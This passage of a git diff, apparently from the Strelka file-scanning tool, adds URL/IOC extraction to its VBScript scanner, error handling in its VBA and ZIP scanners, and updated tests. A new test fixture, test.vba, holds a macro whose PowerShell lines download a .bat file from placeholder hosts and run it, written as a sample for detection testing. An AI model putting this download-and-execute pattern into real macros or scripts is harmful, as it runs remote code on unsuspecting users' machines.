oupon|coupons|courses|cr|credit|creditcard|creditunion|cricket|crown|crs|cruise|cruises|csc|cu|cuisinella|cv|cw|cx|cy|cymru|cyou|cz|dabur|dad|dance|data|date|dating|datsun|day|dclk|dds|de|deal|dealer|deals|degree|delivery|dell|deloitte|delta|democrat|dental|dentist|desi|design|dev|dhl|diamonds|diet|digital|direct|directory|discount|discover|dish|diy|dj|dk|dm|dnp|do|docs|doctor|dodge|dog|doha|domains|dot|download|drive|dtv|dubai|duck|dunlop|duns|dupont|durban|dvag|dvr|dz|earth|eat|ec|eco|edeka|edu|education|ee|eg|email|emerck|energy|engineer|engineering|enterprises|epost|epson|equipment|er|ericsson|erni|es|esq|estate|esurance|et|etisalat|eu|eurovision|eus|events|everbank|exchange|expert|exposed|express|extraspace|fage|fail|fairwinds|faith|family|fan|fans|farm|farmers|fashion|fast|fedex|feedback|ferrari|ferrero|fi|fiat|fidelity|fido|film|final|finance|financial|fire|firestone|firmdale|fish|fishing|fit|fitness|fj|fk|flickr|flights|flir|florist|flowers|fly|fm|fo|foo|food|foodnetwork|football|ford|forex|forsale|forum|foundation|fox|fr|free|fresenius|frl|frogans|frontdoor|frontier|ftr|fujitsu|fujixerox|fun|fund|furniture|futbol|fyi|ga|gal|gallery|gallo|gallup|game|games|gap|garden|gb|gbiz|gd|gdn|ge|gea|gent|genting|george|gf|gg|ggee|gh|gi|gift|gifts|gives|giving|gl|glade|glass|gle|global|globo|gm|gmail|gmbh|gmo|gmx|gn|godaddy|gold|goldpoint|golf|goo|goodhands|goodyear|goog|google|gop|got|gov|gp|gq|gr|grainger|graphics|gratis|green|gripe|grocery|group|gs|gt|gu|guardian|gucci|guge|guide|guitars|guru|gw|gy|hair|hamburg|hangout|haus|hbo|hdfc|hdfcbank|health|healthcare|help|helsinki|here|hermes|hgtv|hiphop|hisamitsu|hitachi|hiv|hk|hkt|hm|hn|hockey|holdings|holiday|homedepot|homegoods|homes|homesense|honda|honeywell|horse|hospital|host|hosting|hot|hoteles|hotels|hotmail|house|how|hr|hsbc|ht|hu|hughes|hyatt|hyundai|ibm|icbc|ice|icu|id|ie|ieee|ifm|ikano|il|im|imamat|imdb|immo|immobilien|in|inc|industries|infiniti|info|ing|ink|institute|insurance|insure|int|intel|international|intuit|investments|io|ipiranga|iq|ir|irish|is|iselect|ismaili|ist|istanbul|it|itau|itv|iveco|jaguar|java|jcb|jcp|je|jeep|jetzt|jewelry|jio|jlc|jll|jm|jmp|jnj|jo|jobs|joburg|jot|joy|jp|jpmorgan|jprs|juegos|juniper|kaufen|kddi|ke|kerryhotels|kerrylogistics|kerryproperties|kfh|kg|kh|ki|kia|kim|kinder|kindle|kitchen|kiwi|km|kn|koeln|komatsu|kosher|kp|kpmg|kpn|kr|krd|kred|kuokgroup|kw|ky|kyoto|kz|la|lacaixa|ladbrokes|lamborghini|lamer|lancaster|lancia|lancome|land|landrover|lanxess|lasalle|lat|latino|latrobe|law|lawyer|lb|lc|lds|lease|leclerc|lefrak|legal|lego|lexus|lgbt|li|liaison|lidl|life|lifeinsurance|lifestyle|lighting|like|lilly|limited|limo|lincoln|linde|link|lipsy|live|living|lixil|lk|llc|loan|loans|locker|locus|loft|lol|london|lotte|lotto|love|lpl|lplfinancial|lr|ls|lt|ltd|ltda|lu|lundbeck|lupin|luxe|luxury|lv|ly|ma|macys|madrid|maif|maison|makeup|man|management|mango|map|market|marketing|markets|marriott|marshalls|maserati|mattel|mba|mc|mckinsey|md|me|med|media|meet|melbourne|meme|memorial|men|menu|merckmsd|metlife|mg|mh|miami|microsoft|mil|mini|mint|mit|mitsubishi|mk|ml|mlb|mls|mm|mma|mn|mo|mobi|mobile|mobily|moda|moe|moi|mom|monash|money|monster|mopar|mormon|mortgage|moscow|moto|motorcycles|mov|movie|movistar|mp|mq|mr|ms|msd|mt|mtn|mtr|mu|museum|mutual|mv|mw|mx|my|mz|na|nab|nadex|nagoya|name|nationwide|natura|navy|nba|nc|ne|nec|net|netbank|netflix|network|neustar|new|newholland|news|next|nextdirect|nexus|nf|nfl|ng|ngo|nhk|ni|nico|nike|nikon|ninja|nissan|nissay|nl|no|nokia|northwesternmutual|norton|now|nowruz|nowtv|np|nr|nra|nrw|ntt|nu|nyc|nz|obi|observer|off|office|okinawa|olayan|olayangroup|oldnavy|ollo|om|omega|one|ong|onl|online|onyourside|ooo|open|oracle|orange|org|organic|origins|osaka|otsuka|ott|ovh|pa|page|panasonic|panerai|paris|pars|partners|parts|party|passagens|pay|pccw|pe|pet|pf|pfizer|pg|ph|pharmacy|phd|philips|phone|photo|photography|photos|physio|piaget|pics|pictet|pictures|pid|pin|ping|pink|pioneer|pizza|pk|pl|place|play|playstation|plumbing|plus|pm|pn|pnc|pohl|poker|politie|porn|post|pr|pramerica|praxi|press|prime|pro|prod|productions|prof|progressive|promo|properties|property|protection|pru|prudential|ps|pt|pub|pw|pwc|py|qa|qpon|quebec|quest|qvc|racing|radio|raid|re|read|realestate|realtor|realty|recipes|red|redstone|redumbrella|rehab|reise|reisen|reit|reliance|ren|rent|rentals|repair|report|republican|rest|restaurant|review|reviews|rexroth|rich|richardli|ricoh|rightathome|ril|rio|rip|rmit|ro|rocher|rocks|rodeo|rogers|room|rs|rsvp|ru|rugby|ruhr|run|rw|rwe|ryukyu|sa|saarland|safe|safety|sakura|sale|salon|samsclub|samsung|sandvik|sandvikcoromant|sanofi|sap|sarl|sas|save|saxo|sb|sbi|sbs|sc|sca|scb|schaeffler|schmidt|scholarships|school|schule|schwarz|science|scjohnson|scor|scot|sd|se|search|seat|secure|security|seek|select|sener|services|ses|seven|sew|sex|sexy|sfr|sg|sh|shangrila|sharp|shaw|shell|shia|shiksha|shoes|shop|shopping|shouji|show|showtime|shriram|si|silk|sina|singles|site|sj|sk|ski|skin|sky|skype|sl|sling|sm|smart|smile|sn|sncf|so|soccer|social|softbank|software|sohu|solar|solutions|song|sony|soy|space|spiegel|sport|spot|spreadbetting|sr|srl|srt|st|stada|staples|star|starhub|statebank|statefarm|statoil|stc|stcgroup|stockholm|storage|store|stream|studio|study|style|su|sucks|supplies|supply|support|surf|surgery|suzuki|sv|swatch|swiftcover|swiss|sx|sy|sydney|symantec|systems|sz|tab|taipei|talk|taobao|target|tatamotors|tatar|tattoo|tax|taxi|tc|tci|td|tdk|team|tech|technology|tel|telefonica|temasek|tennis|teva|tf|tg|th|thd|theater|theatre|tiaa|tickets|tienda|tiffany|tips|tires|tirol|tj|tjmaxx|tjx|tk|tkmaxx|tl|tm|tmall|tn|to|today|tokyo|tools|top|toray|toshiba|total|tours|town|toyota|toys|tr|trade|trading|training|travel|travelchannel|travelers|travelersinsurance|trust|trv|tt|tube|tui|tunes|tushu|tv|tvs|tw|tz|ua|ubank|ubs|uconnect|ug|uk|unicom|university|uno|uol|ups|us|uy|uz|va|vacations|vana|vanguard|vc|ve|vegas|ventures|verisign|versicherung|vet|vg|vi|viajes|video|vig|viking|villas|vin|vip|virgin|visa|vision|vistaprint|viva|vivo|vlaanderen|vn|vodka|volkswagen|volvo|vote|voting|voto|voyage|vu|vuelos|wales|walmart|walter|wang|wanggou|warman|watch|watches|weather|weatherchannel|webcam|weber|website|wed|wedding|weibo|weir|wf|whoswho|wien|wiki|williamhill|win|windows|wine|winners|wme|wolterskluwer|woodside|work|works|world|wow|ws|wtc|wtf|xbox|xerox|xfinity|xihuan|xin|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--3bst00m|xn--3ds443g|xn--3e0b707e|xn--3hcrj9c|xn--3oq18vl8pn36a|xn--3pxu8k|xn--42c2d9a|xn--45br5cyl|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--54b7fta0cc|xn--55qw42g|xn--55qx5d|xn--5su34j936bgsg|xn--5tzm5g|xn--6frz82g|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--80aqecdr1a|xn--80asehdb|xn--80aswg|xn--8y0a063a|xn--90a3ac|xn--90ae|xn--90ais|xn--9dbq2a|xn--9et52u|xn--9krt00a|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--c1avg|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--clchc0ea0b2g2a9gcd|xn--czr694b|xn--czrs0t|xn--czru2d|xn--d1acj3b|xn--d1alf|xn--e1a4c|xn--eckvdtc9d|xn--efvy88h|xn--estv75g|xn--fct429k|xn--fhbei|xn--fiq228c5hs|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--fzys8d69uvgm|xn--g2xx48c|xn--gckr3f0f|xn--gecrj9c|xn--gk3at1e|xn--h2breg3eve|xn--h2brj9c|xn--h2brj9c8c|xn--hxt814e|xn--i1b6b1a6a2e|xn--imr513n|xn--io0a7i|xn--j1aef|xn--j1amh|xn--j6w193g|xn--jlq61u9w7b|xn--jvr189m|xn--kcrx77d1x4a|xn--kprw13d|xn--kpry57d|xn--kpu716f|xn--kput3i|xn--l1acc|xn--lgbbat1ad8j|xn--mgb9awbf|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbaakc7dvf|xn--mgbaam7a8h|xn--mgbab2bd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--mgbb9fbpob|xn--mgbbh1a|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbca7dzdo|xn--mgberp4a5d4ar|xn--mgbgu82a|xn--mgbi4ecexp|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--mgbx4cd0ab|xn--mix891f|xn--mk1bu44c|xn--mxtq1m|xn--ngbc5azd|xn--ngbe9e0a|xn--ngbrx|xn--node|xn--nqv7f|xn--nqv7fs00ema|xn--nyqy26a|xn--o3cw4h|xn--ogbpf8fl|xn--otu796d|xn--p1acf|xn--p1ai|xn--pbt977c|xn--pgbs0dh|xn--pssy2u|xn--q9jyb4c|xn--qcka1pmc|xn--qxam|xn--rhqv96g|xn--rovu88b|xn--rvc1e0am3e|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--tckwe|xn--tiq49xqyj|xn--unup4y|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--vhquv|xn--vuq861b|xn--w4r85el8fhu5dnra|xn--w4rs40l|xn--wgbh1c|xn--wgbl6a|xn--xhq521b|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--y9a3aq|xn--yfro4i67o|xn--ygbi2ammx|xn--zfr164b|xxx|xyz|yachts|yahoo|yamaxun|yandex|ye|yodobashi|yoga|yokohama|you|youtube|yt|yun|za|zappos|zara|zero|zip|zippo|zm|zone|zuerich|zw)|(?:(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]))(?:[;/][^#?<>\s]*)?(?:\?[^#<>\s]*)?(?:#[^<>\s\(\)]*)?(?!\w))', + re.IGNORECASE, ) - highlight_list = highlight.split(b"\n") + def scan(self, data, file, options, expire_at): + """ + Scans the VB script file, tokenizes it, and extracts useful components. + + Args: + data: Content of the file being scanned. + file: File metadata. + options: Scanner options. + expire_at: Expiry timestamp of the scan task. + """ + # Tokenize the script data using the Pygments lexer + try: + # Tokenize the script data using the Pygments lexer + highlight = pygments.highlight( + data, self.lexer, formatters.RawTokenFormatter() + ) + except Exception as e: + self.flags.append(f"highlighting_error: {str(e)[:50]}") + return + + try: + highlight_list = highlight.split(b"\n") + except Exception as e: + self.flags.append(f"highlight_split_error: {str(e)[:50]}") + return + + # Initialize containers for script components ordered_highlights = [] + for hl in highlight_list: - split_highlight = hl.split(b"\t") - if len(split_highlight) == 2: - token = split_highlight[0].decode() - value = split_highlight[1].decode().strip("'\"").strip() - highlight_entry = {"token": token, "value": value} - if highlight_entry["value"]: - ordered_highlights.append(highlight_entry) + try: + split_highlight = hl.split(b"\t") + if len(split_highlight) == 2: + token, value = split_highlight + token = token.decode() + value = value.decode().strip("'\"").strip() + # Add non-empty values to the ordered highlights + if value: + ordered_highlights.append({"token": token, "value": value}) + except Exception as e: + self.flags.append(f"token_parsing_error: {str(e)[:50]}") + + # Initialize event fields to store extracted data self.event.setdefault("tokens", []) self.event.setdefault("comments", []) self.event.setdefault("functions", []) self.event.setdefault("names", []) self.event.setdefault("operators", []) self.event.setdefault("strings", []) + self.event.setdefault("urls", []) + + # Get script length + self.event["script_length_bytes"] = len(data) + + # Process and categorize each token + try: + for ohlp in ordered_highlights: + self.categorize_token(ohlp) + except Exception as e: + self.flags.append(f"token_categorization_error: {str(e)[:50]}") + + # Remove duplicates and add URLs as IOCs + try: + if self.event["urls"]: + self.event["urls"] = list(set(self.event["urls"])) + self.add_iocs(self.event["urls"]) + except Exception as e: + self.flags.append(f"ioc_extraction_error: {str(e)[:50]}") + + def categorize_token(self, ohlp): + """ + Categorizes a token and extracts relevant information. + + Args: + ohlp: A dictionary containing a token and its value. + """ + token, value = ohlp["token"], ohlp["value"] + + if token not in self.event["tokens"]: + self.event["tokens"].append(token) + + if token == "Token.Comment": + if value not in self.event["comments"]: + self.event["comments"].append(value) + self.extract_urls(value) + + elif token == "Token.Name.Function": + if value not in self.event["functions"]: + self.event["functions"].append(value) + + elif token == "Token.Name": + if value not in self.event["names"]: + self.event["names"].append(value) + + elif token == "Token.Operator": + if value not in self.event["operators"]: + self.event["operators"].append(value) + + elif token == "Token.Literal.String": + if value not in self.event["strings"]: + self.event["strings"].append(value) + self.extract_urls(value) + + def extract_urls(self, text): + """ + Extracts URLs from the provided text using regex matching. - position = 0 - while position < len(ordered_highlights): - ohlp = ordered_highlights[position] - if ohlp["token"] not in self.event["tokens"]: - self.event["tokens"].append(ohlp["token"]) - if ohlp["token"] == "Token.Comment": - if ohlp["value"] not in self.event["comments"]: - self.event["comments"].append(ohlp["value"]) - elif ohlp["token"] == "Token.Name.Function": - if ohlp["value"] not in self.event["functions"]: - self.event["functions"].append(ohlp["value"]) - elif ohlp["token"] == "Token.Name": - if ohlp["value"] not in self.event["names"]: - self.event["names"].append(ohlp["value"]) - elif ohlp["token"] == "Token.Operator": - if ohlp["value"] not in self.event["operators"]: - self.event["operators"].append(ohlp["value"]) - elif ohlp["token"] == "Token.Literal.String": - if ohlp["value"] not in self.event["strings"]: - self.event["strings"].append(ohlp["value"]) - position += 1 + Args: + text: Text content from which URLs are to be extracted. + """ + try: + urls = self.url_regex.findall(text) + for url in urls: + if url not in self.event["urls"]: + self.event["urls"].append(url) + except Exception as e: + self.flags.append(f"url_extraction_error: {str(e)[:50]}") diff --git a/src/python/strelka/scanners/scan_vba.py b/src/python/strelka/scanners/scan_vba.py index fa11de10..c07b8544 100644 --- a/src/python/strelka/scanners/scan_vba.py +++ b/src/python/strelka/scanners/scan_vba.py @@ -16,8 +16,8 @@ class ScanVba(strelka.Scanner): """ def scan(self, data, file, options, expire_at): + vba = None analyze_macros = options.get("analyze_macros", True) - self.event["total"] = {"files": 0, "extracted": 0} try: @@ -58,8 +58,13 @@ def scan(self, data, file, options, expire_at): elif macro_type == "Suspicious": self.event["suspicious"].append(keyword) + if self.event["ioc"]: + self.add_iocs(list(set(self.event["ioc"]))) + except olevba.FileOpenError: self.flags.append("file_open_error") + except AttributeError: + self.flags.append("attribute_error") finally: - # TODO referenced before potential assignment as vba is opened in a try / catch block - vba.close() + if vba: + vba.close() diff --git a/src/python/strelka/scanners/scan_zip.py b/src/python/strelka/scanners/scan_zip.py index 784bb03e..58181043 100644 --- a/src/python/strelka/scanners/scan_zip.py +++ b/src/python/strelka/scanners/scan_zip.py @@ -110,7 +110,7 @@ def scan(self, data, file, options, expire_at): except RuntimeError: self.flags.append("runtime_error") except pyzipper.BadZipFile: - self.flags.append("bad_zip") + self.flags.append("bad_zip_file") except zlib.error: self.flags.append("zlib_error") @@ -131,10 +131,15 @@ def scan(self, data, file, options, expire_at): self.flags.append("zlib_error") # Top level compression metric - size_difference_total = file_size_total - compress_size_total - self.event["compression_rate"] = round( - (size_difference_total * 100.0) / file_size_total, 2 - ) + try: + size_difference_total = file_size_total - compress_size_total + self.event["compression_rate"] = round( + (size_difference_total * 100.0) / file_size_total, 2 + ) + except ZeroDivisionError: + self.flags.append("file_size_zero") except pyzipper.BadZipFile: - self.flags.append("bad_zip") + self.flags.append("bad_zip_file") + except ValueError: + self.flags.append("value_error") diff --git a/src/python/strelka/tests/fixtures/test.pdf b/src/python/strelka/tests/fixtures/test.pdf old mode 100755 new mode 100644 index 4c147ed2..e4cf4094 Binary files a/src/python/strelka/tests/fixtures/test.pdf and b/src/python/strelka/tests/fixtures/test.pdf differ diff --git a/src/python/strelka/tests/fixtures/test.vba b/src/python/strelka/tests/fixtures/test.vba new file mode 100644 index 00000000..dd3300ba --- /dev/null +++ b/src/python/strelka/tests/fixtures/test.vba @@ -0,0 +1,30 @@ +Option Explicit +Sub AutoOpen() +' +' AutoOpen Macro +' + +MsgBox "Hello World!" + +End Sub + + +Private Sub Document_Open() + +MsgBox "Hello World!" + +End Sub + +Private Sub Testing_Iocs() + +Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") +Set objStartup = objWMIService.Get("Win32_ProcessStartup") +Set objConfig = objStartup.SpawnInstance_ +objConfig.ShowWindow = 0 +Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") +ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://www.test.example.com -OutFile $env:tmp\test.txt +Start-Process -Filepath $env:tmp\invoice.one" +ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://www.test.com/test.bat -OutFile $env:tmp\test.bat +Start-Process -Filepath $env:tmp\test.bat" + +End Sub \ No newline at end of file diff --git a/src/python/strelka/tests/test_scan_ole.py b/src/python/strelka/tests/test_scan_ole.py index 8867edd1..29c3b821 100644 --- a/src/python/strelka/tests/test_scan_ole.py +++ b/src/python/strelka/tests/test_scan_ole.py @@ -57,8 +57,8 @@ def test_scan_ole_doc_pe(mocker): test_scan_event = { "elapsed": mock.ANY, - "flags": ["attribute_error_in_stream"], - "total": {"streams": 10, "extracted": 9}, + "flags": [], + "total": {"streams": 10, "extracted": 10}, } scanner_event = run_test_scan( @@ -79,8 +79,8 @@ def test_scan_ole_doc_pe_classic(mocker): test_scan_event = { "elapsed": mock.ANY, - "flags": ["attribute_error_in_stream"], - "total": {"streams": 13, "extracted": 12}, + "flags": [], + "total": {"streams": 13, "extracted": 13}, } scanner_event = run_test_scan( diff --git a/src/python/strelka/tests/test_scan_pdf.py b/src/python/strelka/tests/test_scan_pdf.py index 10fd00c0..de5204c7 100644 --- a/src/python/strelka/tests/test_scan_pdf.py +++ b/src/python/strelka/tests/test_scan_pdf.py @@ -17,9 +17,84 @@ def test_scan_pdf(mocker): "elapsed": mock.ANY, "flags": [], "images": 1, - "lines": 34, - "links": [], - "words": 418, + "lines": 32, + "links": unordered( + ["http://bing.com", "https://duckduckgo.com", "https://google.com"] + ), + "words": 421, + "xref_object": unordered( + [ + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>/Border[0 0 0]/Rect[74.8708 81.507 171.716 95.5623]/Subtype/Link/Type/Annot>>", + "<>", + "[250 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 0 0 611 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 444 0 0 0 0 0 0 0 778 0 500 500 0 333 389 0 500]", + "<>", + "<>", + "<>/MediaBox[0 0 612 792]/Parent 2 0 R/Resources<>/Font<>/ProcSet[/PDF/Text/ImageC]/XObject<>>>/StructParents 0/Tabs/S/Type/Page>>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>/Border[0 0 0]/Rect[382.256 32.834 472.048 46.8893]/Subtype/Link/Type/Annot>>", + "<>", + "<>", + "<>", + "null", + "<>", + "<>/Metadata 53 0 R/Pages 2 0 R/StructTreeRoot 15 0 R/Type/Catalog>>", + "<>", + "<>", + "<>", + "[46 0 R 47 0 R 48 0 R 49 0 R]", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "[57 0 R]", + "<>", + "<>", + "<>/Filter/FlateDecode/ID[<996084F03FED2848AB7A00AD5BCAA8E6>]/Info 14 0 R/Length 227/Root 1 0 R/Size 82/Type/XRef/W[1 3 1]>>", + "<>", + "<>", + "<>/Border[0 0 1]/H/I/Rect[37.9638 49.0876 258.547 72.6514]/Subtype/Link/Type/Annot>>", + "<>/Font<>>>/Fields[]>>", + "<>", + "<>", + "<>/Border[0 0 0]/Rect[382.256 45.506 424.517 59.5613]/Subtype/Link/Type/Annot>>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "[278 0 0 0 0 0 0 0 0 0 0 0 278 0 278 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 667 0 722 722 0 0 0 0 278 0 0 556 833 722 0 667 778 0 667 0 0 667 0 0 0 0 0 0 0 0 0 0 556 556 500 556 556 278 556 556 222 222 0 222 833 556 556 556 556 333 500 278 556 500 0 500]", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "<>", + "[64 0 R]", + "<>", + "[20 0 R 23 0 R 24 0 R 27 0 R 26 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 33 0 R 33 0 R 34 0 R 34 0 R 35 0 R]", + ] + ), "author": "Ryan.OHoro", "creator": "Microsoft® Word 2016", "creation_date": "2022-12-16T19:48:52Z", @@ -27,63 +102,19 @@ def test_scan_pdf(mocker): "embedded_files": {"count": 0, "names": []}, "encrypted": False, "needs_pass": False, - "format": "PDF 1.5", + "format": "PDF 1.6", "keywords": "", "language": "en", - "modify_date": "2022-12-16T19:48:52Z", - "old_xrefs": True, + "modify_date": "2024-01-08T14:48:01Z", + "old_xrefs": False, "pages": 1, "producer": "Microsoft® Word 2016", "repaired": False, "subject": "", "title": "", - "xrefs": 40, + "xrefs": 81, "phones": [], "objects": {}, - "xref_object": unordered( - [ - "<

>", - "<

>", - "<>", - "<>", - "<>", - "<

>", - "<

>", - "<>/Font<>/XObject<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/MediaBox[0 0 612 792]/Contents 4 0 R/Group<>/Tabs/S/StructParents 0>>", - "<>", - "<

>", - "<>>>", - "<<996084F03FED2848AB7A00AD5BCAA8E6>]/Filter/FlateDecode/Length 132>>", - "<>", - "<

>", - "[20 0 R 23 0 R 24 0 R 27 0 R 26 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 28 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 29 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 30 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 31 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 32 0 R 33 0 R 33 0 R 34 0 R 34 0 R 35 0 R]", - "<>", - "<

>", - "<

>", - "<

>", - "[278 0 0 0 0 0 0 0 0 0 0 0 278 0 278 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 667 0 722 722 0 0 0 0 278 0 0 556 833 722 0 667 778 0 667 0 0 667 0 0 0 0 0 0 0 0 0 0 556 556 500 556 556 278 556 556 222 222 0 222 833 556 556 556 556 333 500 278 556 500 0 500]", - "<>", - "[226]", - "<

>", - "<>", - "<>", - "<

>", - "<>", - "[250 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 0 0 611 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 444 0 0 0 0 0 0 0 778 0 500 500 0 333 389 0 500]", - "<>", - "<>", - "<>", - "<>", - "<

>", - "<>", - "<

>", - "<

>", - "</CreationDate(D:20221216134852-06'00')/ModDate(D:20221216134852-06'00')/Producer>>", - "<>", - "<

>", - "<

>", - ] - ), } scanner_event = run_test_scan( diff --git a/src/python/strelka/tests/test_scan_pe.py b/src/python/strelka/tests/test_scan_pe.py index 246eb8f6..c6317dfa 100644 --- a/src/python/strelka/tests/test_scan_pe.py +++ b/src/python/strelka/tests/test_scan_pe.py @@ -15,7 +15,8 @@ def test_scan_pe(mocker): test_scan_event = { "elapsed": mock.ANY, - "flags": ["no_certs_found"], + "flags": [], + "security": "no_certs_found", "total": {"libraries": 0, "resources": 2, "sections": 2, "symbols": 0}, "summary": { "resource_md5": unordered( @@ -114,53 +115,59 @@ def test_scan_pe(mocker): "operating_system_version": 4.0, "subsystem_version": 4.0, "compile_time": "2104-07-18T17:22:04", - "dll_characteristics": [ - "DYNAMIC_BASE", - "NX_COMPAT", - "NO_SEH", - "TERMINAL_SERVER_AWARE", - ], - "image_characteristics": ["EXECUTABLE_IMAGE", "LARGE_ADDRESS_AWARE"], - "resources": [ - { - "id": 1, - "language": {"sub": "NEUTRAL", "primary": "NEUTRAL"}, - "type": "VERSION", - "md5": "f4741884351459aa7733725b88e693af", - "sha1": "5371904ee7671fb0b066d9323eda553269f344f9", - "sha256": "d8df3d0358a91b3ef97c4d472b34a60f7cf9ee7f1a6f37058fc3d1af3a156a36", - }, - { - "id": 1, - "language": {"sub": "NEUTRAL", "primary": "NEUTRAL"}, - "type": "MANIFEST", - "md5": "b7db84991f23a680df8e95af8946f9c9", - "sha1": "cac699787884fb993ced8d7dc47b7c522c7bc734", - "sha256": "539dc26a14b6277e87348594ab7d6e932d16aabb18612d77f29fe421a9f1d46a", - }, - ], - "sections": [ - { - "address": {"physical": 1743, "virtual": 8192}, - "characteristics": ["CNT_CODE", "MEM_EXECUTE", "MEM_READ"], - "entropy": 4.621214196319175, - "name": ".text", - "size": 2048, - "md5": "cc14da7fb94ef9b27a926fe95b86b44f", - "sha1": "3d584b265a558dc22fa6dfa9991ae7eafee5c1a4", - "sha256": "bb31a5224e9f78905909655d9c80ba7d63f03910e4f22b296d6b7865e2a477c3", - }, - { - "address": {"physical": 1472, "virtual": 16384}, - "characteristics": ["CNT_INITIALIZED_DATA", "MEM_READ"], - "entropy": 4.09070377434219, - "name": ".rsrc", - "size": 1536, - "md5": "c3eafa2cd34f98a226e31b8ea3fea400", - "sha1": "00104b432a8e7246695843e4f2d7cf2582efa3e6", - "sha256": "86d9755b2ba9d8ffd765621f09844dd62d0b082fdc4aafa63b3b3f3ae25d9c77", - }, - ], + "dll_characteristics": unordered( + [ + "DYNAMIC_BASE", + "NX_COMPAT", + "NO_SEH", + "TERMINAL_SERVER_AWARE", + ] + ), + "image_characteristics": unordered(["EXECUTABLE_IMAGE", "LARGE_ADDRESS_AWARE"]), + "resources": unordered( + [ + { + "id": 1, + "language": {"sub": "NEUTRAL", "primary": "NEUTRAL"}, + "type": "VERSION", + "md5": "f4741884351459aa7733725b88e693af", + "sha1": "5371904ee7671fb0b066d9323eda553269f344f9", + "sha256": "d8df3d0358a91b3ef97c4d472b34a60f7cf9ee7f1a6f37058fc3d1af3a156a36", + }, + { + "id": 1, + "language": {"sub": "NEUTRAL", "primary": "NEUTRAL"}, + "type": "MANIFEST", + "md5": "b7db84991f23a680df8e95af8946f9c9", + "sha1": "cac699787884fb993ced8d7dc47b7c522c7bc734", + "sha256": "539dc26a14b6277e87348594ab7d6e932d16aabb18612d77f29fe421a9f1d46a", + }, + ] + ), + "sections": unordered( + [ + { + "address": {"physical": 1743, "virtual": 8192}, + "characteristics": ["CNT_CODE", "MEM_EXECUTE", "MEM_READ"], + "entropy": 4.621214196319175, + "name": ".text", + "size": 2048, + "md5": "cc14da7fb94ef9b27a926fe95b86b44f", + "sha1": "3d584b265a558dc22fa6dfa9991ae7eafee5c1a4", + "sha256": "bb31a5224e9f78905909655d9c80ba7d63f03910e4f22b296d6b7865e2a477c3", + }, + { + "address": {"physical": 1472, "virtual": 16384}, + "characteristics": ["CNT_INITIALIZED_DATA", "MEM_READ"], + "entropy": 4.09070377434219, + "name": ".rsrc", + "size": 1536, + "md5": "c3eafa2cd34f98a226e31b8ea3fea400", + "sha1": "00104b432a8e7246695843e4f2d7cf2582efa3e6", + "sha256": "86d9755b2ba9d8ffd765621f09844dd62d0b082fdc4aafa63b3b3f3ae25d9c77", + }, + ] + ), "symbols": {"exported": [], "imported": [], "libraries": [], "table": []}, } diff --git a/src/python/strelka/tests/test_scan_url.py b/src/python/strelka/tests/test_scan_url.py index ff2a2575..2d49789d 100644 --- a/src/python/strelka/tests/test_scan_url.py +++ b/src/python/strelka/tests/test_scan_url.py @@ -1,6 +1,8 @@ from pathlib import Path from unittest import TestCase, mock +from pytest_unordered import unordered + from strelka.scanners.scan_url import ScanUrl as ScanUnderTest from strelka.tests import run_test_scan @@ -14,12 +16,14 @@ def test_scan_url_text(mocker): test_scan_event = { "elapsed": 